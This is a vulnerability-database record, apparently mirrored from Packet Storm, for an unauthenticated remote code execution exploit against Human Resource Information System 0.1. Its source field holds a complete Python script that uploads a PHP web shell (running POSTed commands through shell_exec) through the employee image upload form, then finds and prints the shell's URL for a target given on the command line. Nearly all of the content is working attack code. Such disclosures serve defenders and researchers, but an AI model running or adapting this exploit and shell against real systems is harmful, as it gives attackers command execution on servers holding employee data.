DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:162496", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Human Resource Information System 0.1 Remote Code Execution", "description": "", "published": "2021-05-07T00:00:00", "modified": "2021-05-07T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/162496/Human-Resource-Information-System-0.1-Remote-Code-Execution.html", "reporter": "Reza Afsahi", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-05-07T15:56:55", "viewCount": 262, "enchantments": {"dependencies": {}, "score": {"value": 0.0, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "_state": {"dependencies": 1678920471, "score": 1678917189, "epss": 1679070268}, "_internal": {"score_hash": "c5819d93b20d79eb6b4b60e2d3e6a971"}, "sourceHref": "https://packetstormsecurity.com/files/download/162496/hris01-exec.txt", "sourceData": "`# Exploit Title: Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated) \n# Date: 04-05-2021 \n# Exploit Author: Reza Afsahi \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/14714/human-resource-information-using-phpmysqliobject-orientedcomplete-free-sourcecode.html \n# Software Download: https://www.sourcecodester.com/download-code?nid=14714&title=Human+Resource+Information+System+Using+PHP+with+Source+Code \n# Version: 0.1 \n# Tested on: PHP 7.4.11 , Linux x64_x86 \n \n############################################################################################################ \n \n# Description: \n# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. \n \n############################################################################################################ \n \n# Proof of concept: \n \n#!/usr/bin/python3 \n \nimport requests \nimport sys \nfrom bs4 import BeautifulSoup \n \ndef find_shell(domain): \nreq_2 = requests.get(domain + \"/Admin_Dashboard/Add_employee.php\") \nsoup = BeautifulSoup(req_2.content , \"html.parser\") \nimgs = soup.find_all(\"img\") \nfor i in imgs: \nsrc = i['src'] \nif (\"shell.php\" in src): \nprint(\" [!] Your shell is ready :) ==> \" + domain + \"/Admin_Dashboard/\" + src + \"\\n\") \nbreak \nelse: \ncontinue \n \ndef upload_file(domain): \n \nprint(\"\\n [!] Uploading Shell . . .\") \npayload = \"\"\" \n<!DOCTYPE html> \n<html> \n<head> \n<title> Shell </title> \n</head> \n<body> \n<form action=\"#\" method=\"post\"> \n<input type=\"text\" name=\"cmd\" style=\"width: 300px; height: 30px;\" placeholder=\"Your Command ...\"> \n<br><br> \n<input type=\"submit\" name=\"submit\" value=\"execute\"> \n</form> \n<?php \n$cmd = $_POST['cmd']; \n$result = shell_exec($cmd); \necho \"<pre>{$result}</pre>\"; \n \n?> \n</body> \n</html> \n\"\"\" \n \nh = { \n\"Content-Type\" : \"multipart/form-data\" \n} \n \nf = {'employee_image':('shell.php',payload, \n'application/x-php', {'Content-Disposition': 'form-data'} \n) \n} \nd = { \n\"emplo\" : \"\", \n\"employee_companyid\" : \"test\", \n\"employee_firstname\" : \"test\", \n\"employee_lastname\" : \"test\", \n\"employee_middlename\" : \"test\", \n\"branches_datefrom\" : \"0011-11-11\", \n\"branches_recentdate\" : \"2222-11-11\", \n\"employee_position\" : \"test\", \n\"employee_contact\" : \"23123132132\", \n\"employee_sss\" : \"test\", \n\"employee_tin\" : \"test\", \n\"employee_hdmf_pagibig\" : \"test\", \n\"employee_gsis\" : \"test\" \n} \nurl = domain + \"/Admin_Dashboard/process/addemployee_process.php\" \nreq = requests.post(url , data=d , files = f) \nif req.status_code == 200: \nif (\"Insert Successfully\" in req.text): \nprint(\"\\n [!] Shell uploaded succefully\\n\") \nfind_shell(domain) \n \nelse: \nprint(\"Exploit Failed 1\") \n \ndef main(): \nif len(sys.argv) != 2: \nprint('[!] usage: %s <target url> ' % sys.argv[0]) \nprint('[!] eg: %s http://vulndomain.com' % sys.argv[0]) \nsys.exit(-1) \n \nprint(\"<><><><><><><><><><><><><><><><><><><><><><><><>\") \nprint(\"<> Human Resource Information System <>\") \nprint(\"<> Shell Uploader <>\") \nprint(\"<><><><><><><><><><><><><><><><><><><><><><><><>\") \ntarget_domain = sys.argv[1] \nupload_file(target_domain) \n \nif __name__ == \"__main__\": \nmain() \n \n \n`\n"}

{}